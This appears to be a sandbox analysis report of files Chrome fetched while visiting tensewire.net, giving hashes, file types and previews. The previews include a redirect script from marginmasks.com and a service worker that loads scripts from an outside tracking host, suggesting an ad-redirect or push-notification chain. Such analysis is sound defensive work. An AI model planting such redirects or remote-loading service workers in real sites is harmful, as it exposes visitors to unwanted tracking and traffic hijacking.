                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0}],. "tags":[{"function":"__gct","vtp_trackingId":"G-JMJ044GLKX","vtp_sessionDuration":0,"tag_id":1},{"function":"__ccd_em_outbound_click","priority":0,"vtp_includeParams":true,"vtp_instanceDestinationId":"G-JMJ044GLKX","tag_id":3},{"function":"__ccd_em_download","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JMJ044GLKX","tag_id":5},{"function":"__ccd_em_video","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JMJ044GLKX","tag_id":6},{"function":"__ccd_em_site_search","vtp_searchQueryParams":"q,s,search,query,keyword","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JMJ044GLKX","tag_id":7},{"function":"__ccd_em_scroll","vtp_includeParams":true,"vtp_instanceDestinationId":"G-JMJ044GLKX","tag_id":8},{"function"
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 400 x 373, 8-bit/color RGBA, non-interlaced
                              Category:downloaded
                              Size (bytes):100908
                              Entropy (8bit):7.9912967079258985
                              Encrypted:true
                              SSDEEP:3072:1cfS2A9GMqWF4Df6uT9JZl7aFWvQWO7JsXUePmp:1caLfFQRZl7aFUOK9ep
                              MD5:B532C629482B1E0DA3C6745865E819AE
                              SHA1:847B0088D6D3C327CC569EB3D31E8EDFCA393E77
                              SHA-256:DE68FD82DCF271E7CC020002EDDC83B6372B54E2D2806F7159994072409789B1
                              SHA-512:CB70DEB747565F17146943CE410794987CFACCA202A0FE04F6B4ADA2DD5D4DF0AA03436516BB07BC5816F8E291AC1B3486F14D68706B4B59AFB372146C379699
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/uploads/archive/product/697/images/messmaster.png
                              Preview:.PNG........IHDR.......u......6......pHYs..........+.... .IDATx..i.%.Y&....}.y.,w.[...VK4-...#....4.X.........x.?.6....1...8.c..`.abp.`c.[.0.1.D.......j...J....z.\..?2..yN.Su..[...7....yry..y....:..:..:..:..:..:{..u...7.|4.%..HOY..+...Yg..t..i...^...zm^|.k.\.N.Q....Bk..%..CB.:.B.AO.);..~/L.o..J..u6....oz...lg.u.....r38-.....WO.....i....9.k.....H.....c..4b\..(..a.0..@..x.$~.8.l?R......m.'....@:{..q...?x.4...........`G...T. ....H.......X....,..V..%c.).~.V..3m..z.N_...CA..b.(..k.Y...C_...#.N..:.......e.?w.?..8...........).$.@.&....(........^.@..1.B.....A."....`g.. g..`.*..M...'...);.G.,.o....[.....z[.:P..@:{......c...'vt}Q`Q...BvP. $AH.......q.Zk.y.......gJ(v.B.Y@H...H)!........ X......r...!.49..$s%.dc%.+. .m/....r.;.F.=....tG...:....l.._<....G.w^...d......E.[C.8..&dE.B.(...e.%....."M..L.Z............,......J2.`(% D}c.3.. ...@... "0.-P\S.."......%.Q...B...+...........:....7.r.0....G.~.F.........(..;...$.s....h8..... .%.D.h...,30F..5..
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65326)
                              Category:downloaded
                              Size (bytes):160392
                              Entropy (8bit):5.078030630836827
                              Encrypted:false
                              SSDEEP:1536:kw7CIJ0T+r+ryEIA1pDEBi8yNcuSEIA1/uypq3SYiLENM6HN26R:H7VKGGq3SYiLENM6HN26R
                              MD5:023B3876BB73AA541367FC40A193D2B7
                              SHA1:8ED2D6350D23F857D92805737D0F97C675DE666B
                              SHA-256:F77C0D1739B618EDC4A01CA3F6B2990B01A3009030AF49EE8CF68E83052DF194
                              SHA-512:A1CF7E5D2B351F6E37FC544DF51C3AD859FC12DC631185875D1BE34B8DD8B6E7847B06D2E8E6DF5DC24DCA88631EA54A14FA175D4C7073EAB52BB0DE7BABEFF6
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/assets/vendors/bootstrap-4.5.3/css/bootstrap.min.css
                              Preview:/*!. * Bootstrap v4.5.3 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors. * Copyright 2011-2020 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:bo
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (52784)
                              Category:downloaded
                              Size (bytes):52785
                              Entropy (8bit):5.094884955557868
                              Encrypted:false
                              SSDEEP:384:oiybWL9uMdJsI9JkNOdgeJgrYivDSCbKqXIIBpP5OWxMe1kK4gJ1ZXXIKGyStIPq:cbE9TxJkiZsdYK2RSZXMJ
                              MD5:A8FC5D253FE103D62359CF6A0E48C37D
                              SHA1:DEDDAC3D35D991C666D5C696EE07A0033C0B01A9
                              SHA-256:378E3D27861E7F79D6F20368F92C4D875F80F0D4A3FAA69A24F088B3BB8F8994
                              SHA-512:ECC593C9F264A4302C794ECF0E31FAE879B17167E00CAAC8B02B495B7B82B0E9EAB2AEADAD8A84250A3E4C8324314F53B6E14E312B49FB143B96D8F95BAF69DC
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/assets/css/dublin/dist/common-hybrid.css?v=454576b4f6c63244067eabf05b8f71b6
                              Preview:input::-webkit-inner-spin-button,input::-webkit-outer-spin-button{-webkit-appearance:none;margin:0}input:-webkit-autofill,select:-webkit-autofill{transition:background-color 5000s ease-in-out 0s}.sa_line_left,.sa_line_right{width:25px;display:inline-block;border-bottom:1px solid;margin-bottom:4px}.img_ind_bg{background-size:cover;background-position:center;z-index:-10;position:fixed;width:100%;height:100%}#questionFooterInp{font-size:16px}.qfinmob{display:none}.dubv4 .qoq_dub4{display:none!important}.dub_img_sp img{max-width:300px}#advEmailStandard #advEmailSub,#questionBody #email-data-btnU{border-bottom-left-radius:0!important;border-top-left-radius:0!important}#advEmailStandard #advEmailInput,#questionBody #email-dataU{border-bottom-right-radius:0!important;border-top-right-radius:0!important}#advEmailStandard .input_alone{display:inline-block;width:60%}.attention_mob{display:none}.dub_img_sp{margin-top:-60px;margin-bottom:20px}.hd.dub_ny_hd{margin-bottom:50px}.dub_bb_ny,.dub_bb_ny.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                              Category:dropped
                              Size (bytes):2003
                              Entropy (8bit):7.259441845387289
                              Encrypted:false
                              SSDEEP:24:HK1h3IWwjx82lY2T3yQVmay7FrwyJ3Vm8jFdBGxtyzUnAFYkXspfIyv2Hp954xmV:Il1Nn2WQcbBfJ3cgXaEXPXslrzmV
                              MD5:4D036644BEBAF0AFBA1EC39FE3C51E72
                              SHA1:FB4867B0324DB747CF571A04B55069EC1F9F5D6F
                              SHA-256:5157378A4441BC07C005F21B99D77D0C6406D86A2A55EECA84304941F8645182
                              SHA-512:B4CBCA158B91769C3B2F3281CF1C27517D457A61839026D7954A03F03B4AED1A5C2EB4F183694FC814D42B1665A21F77C121BB8E36BED5C79DA1BCC8E0E0A6BB
                              Malicious:false
                              Reputation:low
                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:7FB82F6C8B7F11ED8DCDDBBBF94F5104" xmpMM:DocumentID="xmp.did:7FB82F6D8B7F11ED8DCDDBBBF94F5104"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7FB82F6A8B7F11ED8DCDDBBBF94F5104" stRef:documentID="xmp.did:7FB82F6B8B7F11ED8DCDDBBBF94F5104"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (63162), with no line terminators
                              Category:downloaded
                              Size (bytes):507459
                              Entropy (8bit):4.8344082907094155
                              Encrypted:false
                              SSDEEP:6144:nf/cvRXjWQ9lhHlbz8CLnlRG6QimQMnH08r:nncvRr9lVlv8CR1Q7Hn
                              MD5:EE2940EACD6B7DA4BD5D186CA2052CAA
                              SHA1:1969356AE5E04D9BE2A14DCD845B36DA83C4354D
                              SHA-256:BA166F4F23A50ED951D93710144182516832AB03C0F918436A1D084A83F69BFE
                              SHA-512:9CB2F5B4B056E552A1D46CAAD68CE6B81C4F69A80D77C89D4C8C89055370A62669C71112735252B21DA0786396357208F92B5D7184D18C6DEB46C801CB55DAE4
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/assets/vendors/fontawesome_pro/css/all.min.css
                              Preview:@charset "utf-8";.fa{font-family:var(--fa-style-family,"Font Awesome 6 Pro");font-weight:var(--fa-style,900)}.fa,.fa-classic,.fa-sharp,.fas,.fa-solid,.far,.fa-regular,.fasr,.fal,.fa-light,.fasl,.fat,.fa-thin,.fad,.fa-duotone,.fass,.fa-sharp-solid,.fab,.fa-brands{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-variant:normal;text-rendering:auto;font-style:normal;line-height:1}.fas,.fa-classic,.fa-solid,.far,.fa-regular,.fal,.fa-light,.fat,.fa-thin{font-family:"Font Awesome 6 Pro"}.fab,.fa-brands{font-family:"Font Awesome 6 Brands"}.fad,.fa-classic.fa-duotone,.fa-duotone{font-family:"Font Awesome 6 Duotone"}.fass,.fasr,.fasl,.fa-sharp{font-family:"Font Awesome 6 Sharp"}.fass,.fa-sharp{font-weight:900}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{vertica
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text, with no line terminators
                              Category:downloaded
                              Size (bytes):131
                              Entropy (8bit):4.8963981425299306
                              Encrypted:false
                              SSDEEP:3:gnkAqRAdu6/GY7voOkADYnbi8SaPNDOR+crKUCQhhIb:7AqJm7+mYnb91DMrKUQb
                              MD5:BC02CD1CAF7ABA5B3229CD391B601B35
                              SHA1:244C587331698E666D49D072DC27D86E36C0824A
                              SHA-256:8E208D003D6FAEE985FB27603E62889F1FA99137DDD7EC97E6F4227A0DB04FCB
                              SHA-512:254D8ADD2F33C4D0A38F25A580F5C387659D185E09D8149283DC3F0379936DEA163B9B77D1DFD331E81BD4542FA7AFE39B3FAC18502D9715DDEFEB3B8800404D
                              Malicious:false
                              Reputation:low
                              URL:https://marginmasks.com/0/0/0/d44549cb847e1e460ab518fbf82bb4e2/akdim
                              Preview:<script type="text/javascript">window.location.href="https://tensewire.net/?s1=350359&s2=1174009843&s3=7090&s4=1&s10=4550"</script>
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                              Category:downloaded
                              Size (bytes):2003
                              Entropy (8bit):7.259441845387289
                              Encrypted:false
                              SSDEEP:24:HK1h3IWwjx82lY2T3yQVmay7FrwyJ3Vm8jFdBGxtyzUnAFYkXspfIyv2Hp954xmV:Il1Nn2WQcbBfJ3cgXaEXPXslrzmV
                              MD5:4D036644BEBAF0AFBA1EC39FE3C51E72
                              SHA1:FB4867B0324DB747CF571A04B55069EC1F9F5D6F
                              SHA-256:5157378A4441BC07C005F21B99D77D0C6406D86A2A55EECA84304941F8645182
                              SHA-512:B4CBCA158B91769C3B2F3281CF1C27517D457A61839026D7954A03F03B4AED1A5C2EB4F183694FC814D42B1665A21F77C121BB8E36BED5C79DA1BCC8E0E0A6BB
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/assets/images/ci21.jpg
                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:7FB82F6C8B7F11ED8DCDDBBBF94F5104" xmpMM:DocumentID="xmp.did:7FB82F6D8B7F11ED8DCDDBBBF94F5104"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7FB82F6A8B7F11ED8DCDDBBBF94F5104" stRef:documentID="xmp.did:7FB82F6B8B7F11ED8DCDDBBBF94F5104"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Web Open Font Format (Version 2), TrueType, length 327824, version 772.1280
                              Category:downloaded
                              Size (bytes):327824
                              Entropy (8bit):7.997665630678108
                              Encrypted:true
                              SSDEEP:6144:4lcIeP9PVXx3aB+DC6C218KicG3gnhCkUR5zv/Jh4rYP7tHz:46H9t11C6R2K/WgnhCkUL/bIgtHz
                              MD5:E0F1F10202002BF91422FD3768C2D744
                              SHA1:EC47D73D219D2ADB2971F85450FD1824D38A2DB3
                              SHA-256:BDB9CA4674E16A180AD38BA1B55EA1224A38677E604F5C5E560B85194970B85A
                              SHA-512:5B0830861447D3E25D58CBD3FC65155ECAF6624B6CFC5AA5FB9115330681F3BF141AB2E749226924DFEA45DF7ABAEE3A899965C581A9A9B8F0C4FD5A4857612F
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/assets/vendors/fontawesome_pro/webfonts/fa-solid-900.woff2
                              Preview:wOF2...................E.........................8.$. .`..T...0..X..X..d. ...t,..8..|.~8"E.............PUU....j?.._~.?../.........;. Lf..fw8]n...7Td......{.......T...Z.(.*.Z.. ...y...k....g.....8A=..k"..Uy.yQ...33.q........o...U..;...........x../.BDlb..v.H......*.|mV......./kr.U?.Y.VL.$......|..J~..Dl.so@HU....C...Uo...d.T...?N....W...]..*..mu.,..nC..3.aOf'....8.s...9...s.Z...#.;v.|<Y9.....ux..L.........p{..t:..$...G(....tB..(.. ....1 ...c@D.......6.i.q>........U....Xu.........ifgg.w.$.`D<...e.Y.b.!^C...O...v..s.......y.o......$...Z..E.........D.t.....O...r3.U..EPD..jA8.k..~...a)...M=u......U..G...kw.2.}....+,.B8z..Q.....X..GH...DhK!$...}...I..C..1....|E.f...Y.~U._.s.....}..j.{#.7"..@.F...7..{.}o.s...A*..i..d......'(....F.`#..........;... e=.rf.../..|.....U..%.K......e3./..*..?~......to.)...p......A/c..j....H"v...~..i...B.12..d.YPa......W..H.....Q..wEW.!@...M.u...s....#.2T.......B..h.i.{.iwg.v.....$$.em{....6j5..L.eL..w...[.W..!...Cf.h
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                              Category:downloaded
                              Size (bytes):2692
                              Entropy (8bit):7.889944535623974
                              Encrypted:false
                              SSDEEP:48:HhDkxCXEGYvEzlvcuMJ4gIb03PUGSf3+feLVetPMtoH7DJ8u6mgbY:HhDkcDYv60FJnI4E3+S5oH7DJ8u6LbY
                              MD5:091B619442EA29606ED35C4C5E8E607F
                              SHA1:280E7541AD56AAFA899A004B41FD69731565CE89
                              SHA-256:0E34D082CCDC00408C7C4DDDA543F1247F981EBC756C8458E2B6321D8A4D42A9
                              SHA-512:F91469502859A525F2654BA9A0F2973602912568C951C4B8E3139FE6440634B3CA3D18DDC54A4452AF133E05F4E5CC738C719A3E89F1C0F53FECD12C8C78AF7F
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/assets/images/flags/flag-us.png
                              Preview:.PNG........IHDR...2...2......?......pHYs..........+.....6IDATh..Z{p....}{.>....yH...... ....E+#.Z.mA[Qk..?..Q[g.S.Nig.3.FE.X.A,34.B.....0..............{...:.f..9....u.=........!4..Wy/G..d..<.@..R..u...Q.~.......1"j`.V..s.6.L.x......#../..r..._.`#.iA:1-..#..n..m.....so.@.G...../E.......!....^kN.Y..oTJ.f.?U......#.}.v.s.K....;''.>.....H8..2 ..q.l...g..=..b.<....S ...f..T........$I...H..f^AD.Z....q.':...w...k+..d.#.?.3..^?..=~e~..J....$.-.NFGV.?...H.."z..R......!.`.O.0....(....X.........,;6.G....6Q~..)......t....w.........>....e(p..Gt1....@.;.z...p:.....a..mi".q\.Z....e...Vu..R.R.Z..w..`.=....h.B.7..&.`L...........h.et..P=e..".p.`|...O..'....n$V...n....8m....-..td.3.\_t...F...BQ..Z.t.:...w>.7O..M.c....u|...>.....d[R.%.Z.66..{xc$*.(.. .7?.H.$........._7...F.37.I`....k.'[^.|.......p...........a.r..D.$.p...<q.8..$.:Q.&.D..I.!.......v.........8U...."..V..w...@DE.....H.(^....|..V,(..w.CQ...EN...`......q.Yy.......^..E.>.j.[....$..:....k.iy.L7.>9.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                              Category:dropped
                              Size (bytes):1990
                              Entropy (8bit):7.219494860012059
                              Encrypted:false
                              SSDEEP:48:Il1Nn2WQ0J3wYaJPrXLyzMWp1UpT4sxCgmyPhaEr/6f2gon:C2Q2rKfeT5CgmWV8Hon
                              MD5:0CEF7DE4AD132A1171112B50837071C1
                              SHA1:AFF4ED042AA90335E87075F7477D856F4097DF9E
                              SHA-256:6B3771113EA2C584837A3B4036F7F8F810C11E8B02F78E98EED712C82618077A
                              SHA-512:E4E9D37FE504218419694F88690155F400C0EC3C21F931A172A9AA1D7E2B547C1DDEDFA05363D12205866A7D46DEED204C44C143F20A08B1975D50918C33B186
                              Malicious:false
                              Reputation:low
                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:4A1767A38B8011ED817ADEB99A27D979" xmpMM:DocumentID="xmp.did:4A1767A48B8011ED817ADEB99A27D979"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4A1767A18B8011ED817ADEB99A27D979" stRef:documentID="xmp.did:4A1767A28B8011ED817ADEB99A27D979"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 500 x 83, 8-bit/color RGBA, non-interlaced
                              Category:downloaded
                              Size (bytes):8332
                              Entropy (8bit):7.8527433696689535
                              Encrypted:false
                              SSDEEP:192:cBqaAuJ0azrXMmBfGhISW6knZ/lvMKND3v6i0dAFUx19R8Cs:NaBJ0GrcmBfGhPWJnzvMKNx
                              MD5:F1CE9018B0B0E131BD2ED0E5B68CFE41
                              SHA1:B69DB2E912C438FB0595A245A1C043567A9720F1
                              SHA-256:6397F628A28671D7CFF67CC61337AE3592E014D873A3BB1E916DBED7AE23E48E
                              SHA-512:A4439B7B46C2619F78C0392E7837DA72B2EDDAF9E8C0A307D6ECFED21852F81F9AA0A02F50C9E91FC3AFE80ECBA0C119452BA839F2F4A6E4FAB91C0A48CE9F13
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/uploads/archive/company/55/images/kohls-logo-purple.png
                              Preview:.PNG........IHDR.......S.....i..h...^iCCPDisplay..H.WwXS...[RIh..H..... %..A@. *!.$......]T`."..].Q.....".uQ.e......l.....s...}..;..9.;%3...@../....K....!...i,R................`...j..o....\qQq.....E...I.8S...C|...T ...@..r..2..Cl ..B<K...x..g...A..x.....i|.<...6(g...!..#.].B........b...D.G..OS.y.;@}.. fg~..o....|~.0V.5....,.?...[~.r...4.<2^.?....iQ*L..G.....5..$Bu..@.bed.Z.5.(.0..........)....h.<3K......XR.K.],R.%h87.....,9..Y.....U.)s.8...b.o..u.81.b*...H....6....(..fU"......*.m f...!j~,=K.....+......^..W...#...v.....A.(.r..xD...C..E.a..v.4I./vOV...Y.+....dQ^.Jn....(A...[.7.......%...3r......E .pA(<}J.3.4..$.=M=.z&....d..p.H.V...H.3.... .....Y.(..O.R...d........!..Q ..V....[K...D.....k....8P...(.xY:C..0b(1..Nt.M.@.....`..q6.;...}.cB.......pk..T../.A'...D..u.....C.....q&n.\pOh...A.^P............k.(...2..Lq.v.....0.*._.G.k.pV..3...~.g!......c......,v.k.,...]......z4.........y$.....TeR.Z....Q3..E....&.!.d..Y.....xR..Q,wWw7.T...k..s.[.0.}.....o9.f....8....
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                              Category:dropped
                              Size (bytes):15406
                              Entropy (8bit):1.4037136087364375
                              Encrypted:false
                              SSDEEP:96:ElxRlQUyXO9WBWibsAdBiED26mTXU5bOql2j:ElxRam8BWi5iED264XU5bOql2j
                              MD5:9E3E8B6D89D426AD950F5144D15921E6
                              SHA1:6CEFE5C7CA4A97D2118FB849F37F4FFA4F9F0EE0
                              SHA-256:703063F5CFEBF76BD6190DD87052D6664D3A0FCF474D837D89F6B7FAE7A8F3B5
                              SHA-512:A063BE8A7879B431338506AEA3975376F7ADDF2B9C01563F4AAEFDAA827C2568F76DA0B32BAE9665E09507C9CEBB44FABE6D194E5944E000FC299FA0A41F1C44
                              Malicious:false
                              Reputation:low
                              Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... ............................................................................................................................................................................ ...........Y............................................... ...................Y....................................... ...........................Y............................... ...................................Y...................................................................Z.......................................f...+.......................Y...............9...............g...........).......................Y...............<.......e...................).......................X...........................................*.......................L...........................................*...................t...............................................+...................................................................#...X..................
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with no line terminators
                              Category:downloaded
                              Size (bytes):41
                              Entropy (8bit):4.552197126358234
                              Encrypted:false
                              SSDEEP:3:XbCEj4N2oyKI+:XbCt28I+
                              MD5:6C03F9677F6D355F944DA7BA9F9DE637
                              SHA1:87CA44DE54C62EA37F32B3265FED3C4E06DDAFD2
                              SHA-256:9FA2BBB4C27F55E1D9EF824FDFCB1459B34974B50426301FAC1B5F8D8F8790B1
                              SHA-512:50F35AB635533B39AF74E154B484095F1483CE0AC0586FAC611812833A588C582EEACD3B9B38C9C0BEBF3F50716E34836C8EB3DAC0463E89CA4E902976AB3F2D
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/assets/js/gbvar.js?v=60
                              Preview:const API_URL = "https://unisonroad.com";
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text, with very long lines (1238)
                              Category:downloaded
                              Size (bytes):1239
                              Entropy (8bit):5.068464054671174
                              Encrypted:false
                              SSDEEP:24:ch63Cf5W8QPIHRZ3hwVFS39bYGwNef1yTZsNUkQ1sZmSuLqNWRco5Jcn5IKM6cuY:C6SQnw/x+SR8ZZkQbp1RZ5JwiKMm7Zc
                              MD5:9E8F56E8E1806253BA01A95CFC3D392C
                              SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                              SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                              SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                              Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):186
                              Entropy (8bit):4.8456549006624625
                              Encrypted:false
                              SSDEEP:3:RFD0nR6qKZSaSCeADKLbQBMWnhaEE3/pQAU3ug8MWnhaEE3/OYf:jD0nR6qKfSlbQhhaE6pQAUzohaE6OI
                              MD5:DADDB8DD93581B2A7AAEFBE288201329
                              SHA1:21126B6FF6264E35B26E999BF6919D2FFD737138
                              SHA-256:4E911E16BD2595C34E3BA5BE105178E317B17B4A716BD8BAD3595B0D496E3545
                              SHA-512:04E7DFD81CFB1B6428795A7056C23A97F0866450FC56A7F864896709FFE3EDD2C9197EC9548EEB435A21FAE7517E5D2656029C44C56BA2951B53A65D72ECE052
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/service-worker.js
                              Preview:// general.if(typeof window === 'undefined'){. importScripts('https://trk-amropode.com//scripts/pg/v9e118mez8').}.importScripts('https://trk-amropode.com//scripts/sw/v9e118mez8');
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):1622
                              Entropy (8bit):4.798133134876905
                              Encrypted:false
                              SSDEEP:24:HzcmEmvFYFu73atK2/BrAKWfQIELFtFyuHgdXzDGsV1BTVRjEgsqO3KIDRWW2kx:HIm0Xp/BPoQPLFCdHGs5jNsqO1DwWrx
                              MD5:FED66FB89ACBA82DD74138EBD750C23B
                              SHA1:1266EAE7ABAFB19A2714D9FB00D05CC263ADD748
                              SHA-256:72B629CD526729BD25E6091B21E3E3ED6E16E17FB549A700F029F0C5693B0F4F
                              SHA-512:CE481698DA730D19035486BCB5C3A2C59E36ABC554F07F9ABC272FFA53376AF75BABA0F3DF54C8D46AC8AE4C596D6CEC20B716BD75E68C9368010F7E98A0C1D8
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/inc/msg.v3.js?662a9f54742ee
